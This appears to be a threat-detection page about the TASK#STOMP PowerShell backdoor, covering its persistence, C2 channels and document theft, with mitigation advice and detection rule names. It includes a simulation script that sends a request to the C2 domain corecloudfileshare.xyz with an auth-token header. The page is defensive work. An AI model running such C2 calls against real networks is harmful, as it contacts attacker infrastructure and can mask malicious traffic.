TASK#STOMP: PowerShell Backdoor for Document Theft and Remote Access
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
TASK#STOMP is a resilient PowerShell-based backdoor that leverages VBScript orchestration to establish multiple persistence mechanisms. The malware uses runtime C# compilation to bypass TLS certificate validation and maintains two redundant C2 channels for espionage operations. Its capabilities include automated document theft, surveillance, and arbitrary remote command execution on compromised Windows systems.
Investigation
Securonix Threat Research conducted static and dynamic analysis of the script-driven Windows infection chain. Researchers decoded Base64-encoded payloads, including diag_pack.dat and win_conn_cfg.dat, and reconstructed the execution process tree. The investigation also uncovered timestomping, scheduled task rotation, and runtime .NET compilation techniques used to evade security detection.
Mitigation
Defenders should monitor suspicious process relationships, particularly wscript.exe or cscript.exe launching schtasks.exe with XML definitions stored in user-writable directories. Enabling PowerShell Script Block Logging and AMSI telemetry can help identify in-memory payload decoding. Blocking known C2 domains and detecting unexpected csc.exe child processes spawned by PowerShell can further disrupt execution.
Response
If TASK#STOMP activity is detected, responders should remove all persistence anchors in a coordinated manner, including scheduled tasks and Startup folder entries. Active VBScript and PowerShell instances associated with the WinDefendSvc directory should be terminated. Task XML files and staged .dat payloads should be preserved for forensic analysis before remediation.
Keywords: TASK#STOMP, PowerShell backdoor, VBScript, multi-anchor persistence, C# compilation, TLS certificate validation, redundant C2, document theft, surveillance, remote command execution, Securonix Threat Research, Base64, diag_pack.dat, win_conn_cfg.dat, timestomping, scheduled task rotation, .NET compilation, wscript.exe, cscript.exe, schtasks.exe, Script Block Logging, AMSI, csc.exe, WinDefendSvc.
Attack Flow
Detections
Possible System Enumeration (via cmdline)
Call Suspicious .NET Methods from Powershell (via powershell)
Suspicious Binary / Scripts in Autostart Location (via file_event)
Suspicious Scheduled Task (via audit)
LOLBAS WScript / CScript (via process_creation)
Suspicious Powershell Strings (via cmdline)
Powershell Executing File In Suspicious Directory Using Bypass Execution Policy (via cmdline)
Possible Delayed Execution Behavior (via cmdline)
IOCs (HashSha256) to detect: TASK#STOMP: PowerShell Backdoor for Document Theft and Remote Access
IOCs (SourceIP) to detect: TASK#STOMP: PowerShell Backdoor for Document Theft and Remote Access
IOCs (DestinationIP) to detect: TASK#STOMP: PowerShell Backdoor for Document Theft and Remote Access
Detection of TASK#STOMP PowerShell C2 Communication [Windows Network Connection]
Detect TASK#STOMP PowerShell Backdoor Activity [Windows Powershell]
TASK#STOMP PowerShell Backdoor Detection [Windows Process Creation]
Simulation Execution
-
Attack Narrative & Commands: The adversary has successfully established persistence on a workstation using a TASK#STOMP backdoor. To receive further instructions and exfiltrate stolen data, the malware initiates a PowerShell session. The script is designed to masquerade as legitimate web traffic by communicating with a domain that mimics a file-sharing service (
corecloudfileshare.xyz). To ensure only the authorized backdoor can communicate with the C2, the script includes a hardcodedX-Auth-Tokenin the HTTP request headers. This specific combination of destination and header is the primary trigger for our detection logic. -
Regression Test Script:
# TASK#STOMP Simulation Script # Purpose: Mimic C2 communication to trigger detection rule $C2Domain = "http://corecloudfileshare.xyz/api/checkin" $Headers = @{ "X-Auth-Token" = "STOMP_DEBUG_TOKEN_9928374" "User-Agent" = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } Write-Host "[+] Initiating simulated C2 communication to $C2Domain..." try { # We use -ErrorAction SilentlyContinue because the domain won't resolve in a real test environment Invoke-WebRequest -Uri $C2Domain -Headers $Headers -Method Get -ErrorAction SilentlyContinue Write-Host "[+] Command sent." } catch { Write-Host "[!] Connection failed (Expected if domain is non-existent), but telemetry should be generated." } -
Cleanup Commands:
# No persistent artifacts created by the simulation script. # If a file was dropped, use: Remove-Item -Path "C:pathtosimulated_malware.exe" -Force Write-Host "[+] Simulation cleanup complete. No artifacts removed."